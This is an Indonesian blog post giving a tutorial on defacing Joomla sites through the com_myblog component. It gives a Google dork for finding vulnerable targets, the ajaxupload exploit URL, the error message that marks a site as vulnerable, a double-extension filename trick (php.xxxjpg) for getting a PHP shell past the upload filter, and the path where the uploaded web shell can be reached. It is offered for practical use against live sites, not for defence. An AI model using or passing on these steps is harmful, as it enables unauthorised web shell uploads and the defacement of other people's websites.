Open top menu
Thursday, September 10, 2015

Oke kali ini saya mau share tutorial deface dengan Exploit com_myblog pada CMS Joomla. Exploitnya cukup mudah sehingga bisa langsung dipraktekkan.

Langsung saja

Google dork : inurl:/components/com_myblog/

Exploiter : download

Exploit : /index.php?option=com_myblog&task=ajaxupload



Jika kalian mendapat error


{error: 'No file has been uploaded.', msg: '' }



Tanda nya situsnya vuln.

Langsung eksekusi saja dengan exploiternya. Jalankan dengan xampp jika kalian menggunakan windows atau langsung buka di terminal jika di linux.

Untuk shell , supaya sukses upload dengan ekstensi php.xxxjpg / html.xxxjpg

Jika sukses maka akan ada notice seperti di screenshoot :



Shell akses :

localhost/images/shell.php.xxxjpg





Untuk yang kurang jelas bia lihat videonya disini :







Sekian tutor kali ini semoga bermanfaat.
Tagged
Different Themes
Written by Kcnewbie

Ikatlah ilmu dengan menuliskanya.

0 comments

Subscribe to: Post Comments (Atom)